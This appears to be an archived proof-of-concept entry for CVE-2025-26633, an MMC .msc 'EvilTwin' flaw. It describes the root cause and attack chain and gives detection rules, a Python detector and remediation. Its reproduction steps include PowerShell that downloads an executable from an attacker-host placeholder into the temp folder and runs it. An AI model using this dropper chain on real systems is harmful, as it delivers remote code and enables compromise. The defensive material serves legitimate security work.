PoC Archive

Windows MMC MSC EvilTwin - CVE-2025-26633

by sandsoncosta · 2026-05-17

Severity:          High
CVE:               CVE-2025-26633
Category:          binary
Affected product:  Microsoft Management Console (MMC), Windows
Affected versions: Windows versions prior to March 11, 2025 patch
Disclosed:         2026-05-17
Patch status:      patched

Metadata

Field                 Value
Date Added            2026-05-17
Last Updated          2025-04-08
Author / Researcher   sandsoncosta
CVE / Advisory        CVE-2025-26633
Category              binary
Severity              High
CVSS Score            N/A
Status                Patched
Tags                  RCE, Windows, MMC, MSC, ActiveX, EvilTwin, APT, EncryptHub, Water-Gamayun, zero-day, in-the-wild
Related               N/A

Affected Target

Field                     Value
Software / System         Microsoft Management Console (MMC), Windows
Versions Affected         Windows versions prior to March 11, 2025 patch
Language / Platform       Windows, PowerShell, MSC (XML-based MMC snap-in)
Authentication Required   No
Network Access Required   No (local file delivery; social engineering required)

Summary

CVE-2025-26633 is a zero-day vulnerability in Microsoft Management Console (MMC) that was exploited in the wild by Russian APT group Water Gamayun (EncryptHub/Larva-208). An attacker crafts a malicious .msc file that abuses the MUIPath resolution mechanism: when MMC loads the snap-in, it resolves a secondary .msc file from an attacker-controlled path and executes embedded HTML/ActiveX content in the MMC context. This enables arbitrary command execution without any user interaction beyond opening the .msc file. The vulnerability was used to deploy the EncryptHub stealer, DarkWisp backdoor, and SilentPrism backdoor, and was patched on March 11, 2025.


Vulnerability Details

Root Cause

The root cause is MMC’s MUIPath resolution logic, which allows a .msc file to reference a secondary .msc file for localized UI resources. When MMC processes this reference, it loads and renders the secondary file’s embedded HTML/ActiveX content without adequate path validation or sandbox restrictions. An attacker can substitute the expected MUI resource file with a crafted .msc containing a malicious HTML/ActiveX payload — the “EvilTwin” technique.

Attack Vector

  1. Attacker crafts a malicious .msc file that specifies a MUIPath entry pointing to an attacker-controlled .msc file (the “evil twin”).
  2. The evil twin .msc contains embedded HTML with ActiveX controls that execute arbitrary commands.
  3. Victim is social-engineered into opening the crafted .msc (e.g., via email, download, or UNC share).
  4. MMC loads the evil twin, the HTML/ActiveX payload runs in the MMC process context, executing arbitrary system commands.

The PoC uses a multi-stage approach:

  • Stage 1 (stage1/dropper.ps1): initial dropper/downloader
  • Stage 2: intermediate payload delivery
  • Stage 3 (stage3/shell.ps1): final payload execution (downloads and runs a C2 executable)

Impact

Arbitrary command execution in the context of the logged-in user via the MMC process. In-the-wild exploitation led to the deployment of the EncryptHub information stealer, the DarkWisp backdoor, and the SilentPrism backdoor. If the victim has elevated privileges, full system compromise is possible.


Environment / Lab Setup

OS:       Windows 10/11 (unpatched, prior to March 2025 cumulative update)
Target:   Local Windows host with MMC available
Attacker: Host serving malicious .msc and stage payloads (HTTP server)
Tools:    PowerShell, MMC (mmc.exe), HTTP server for payload hosting

Setup Steps


Proof of Concept

Step-by-Step Reproduction

  1. Stage 1 - Dropper — Deploy stage1/dropper.ps1 on attacker-controlled server; it downloads and executes the next stage.

     # Hosted at http://<attacker>/stage1/dropper.ps1
     # Called by the malicious .msc ActiveX payload

  2. Stage 2 - Payload Delivery — The crafted .msc (evil twin) contains HTML/ActiveX that calls dropper.ps1 via Shell.Application or WScript.Shell.

  3. Stage 3 - Shell — stage3/shell.ps1 downloads the final C2 executable to %TEMP%\c2.exe and launches it.

     # Final stage: fetch the C2 executable into the user's temp directory and start it
     $exePath = "$env:TEMP\c2.exe"
     Invoke-WebRequest -Uri "http://<attacker>/shell.exe" -OutFile $exePath
     Start-Process -FilePath $exePath

Exploit Code

See stage1/dropper.ps1 and stage3/shell.ps1 in this folder.

Expected Output

MMC loads malicious .msc, ActiveX executes PowerShell dropper chain,
final payload (c2.exe) runs in victim context.

Screenshots / Evidence


Detection & Indicators of Compromise

SIEM / IDS Rule (example):

alert process mmc.exe spawning (powershell.exe OR cmd.exe OR wscript.exe)
  msg: "MMC spawned script interpreter - possible CVE-2025-26633 exploitation"
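As an added example that is not part of the archived PoC or the researcher's repository, the rule above expressed as detection logic and run over a few constructed process-creation records. The field names (Image, ParentImage, CommandLine) follow Sysmon Event ID 1 conventions, but the records, paths and the key=value layout are made up for the example; matching is done on the lower-cased file name so that full paths and mixed case in real telemetry do not cause misses.

```python
import re
from typing import Dict, List

# Script interpreters the page's SIEM rule flags when their parent is mmc.exe
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe"}

# Constructed process-creation records (not real telemetry); the layout is a
# simplified key=value line loosely modelled on Sysmon Event ID 1 fields
SAMPLE_EVENTS = [
    'Image=C:\\Windows\\System32\\mmc.exe ParentImage=C:\\Windows\\explorer.exe '
    'CommandLine="mmc.exe C:\\Users\\alice\\Downloads\\invoice.msc"',
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'ParentImage=C:\\Windows\\System32\\mmc.exe CommandLine="powershell.exe"',
    'Image=C:\\Windows\\System32\\cmd.exe ParentImage=C:\\Windows\\explorer.exe '
    'CommandLine="cmd.exe"',
    'Image=C:\\Windows\\System32\\wscript.exe ParentImage=C:\\Windows\\System32\\MMC.EXE '
    'CommandLine="wscript.exe script.vbs"',
    'Image=C:\\Windows\\System32\\notepad.exe ParentImage=C:\\Windows\\System32\\mmc.exe '
    'CommandLine="notepad.exe"',
]

# key=value pairs; a quoted value may contain spaces (e.g. a command line)
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> Dict[str, str]:
    """Split one record into a dict, dropping the quotes around quoted values."""
    return {key: value.strip('"') for key, value in FIELD_RE.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, so matching ignores directory and case."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_mmc_spawned_script_host(event: Dict[str, str]) -> bool:
    """The page's rule: parent is mmc.exe and the child is a script interpreter."""
    return (basename(event.get("ParentImage", "")) == "mmc.exe"
            and basename(event.get("Image", "")) in SCRIPT_HOSTS)


def detect(lines: List[str]) -> List[str]:
    """Return the child image name for every record that trips the rule."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if is_mmc_spawned_script_host(event):
            hits.append(basename(event["Image"]))
    return hits


if __name__ == "__main__":
    for name in detect(SAMPLE_EVENTS):
        print(f"MMC spawned script interpreter ({name}) - possible CVE-2025-26633 exploitation")
```

Note that mmc.exe launching notepad.exe is deliberately not flagged; the rule is scoped to the interpreters named on the page, and any broadening should be driven by what is observed in your own environment.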

Remediation

Action             Detail
Patch              Apply Microsoft March 2025 Patch Tuesday update (KB patching CVE-2025-26633)
Workaround         Block execution of .msc files from untrusted locations via AppLocker or WDAC
Config Hardening   Restrict MMC snap-in execution via Group Policy; monitor for mmc.exe spawning child processes

References


Notes

Multi-stage PoC repository with separate stage directories. Stage 2 directory was present in the repo but file contents could not be retrieved due to API rate limiting at ingest time; only stage1/dropper.ps1 and stage3/shell.ps1 were saved. The actual malicious .msc file (evil twin) was not present as a standalone file in the repo root — the PoC demonstrates the chain via PowerShell stages. Attributed to Russian APT Water Gamayun (EncryptHub / Larva-208). MITRE ATT&CK coverage in researcher’s blog post.

Auto-ingested from https://github.com/sandsoncosta/CVE-2025-26633 on 2026-05-17.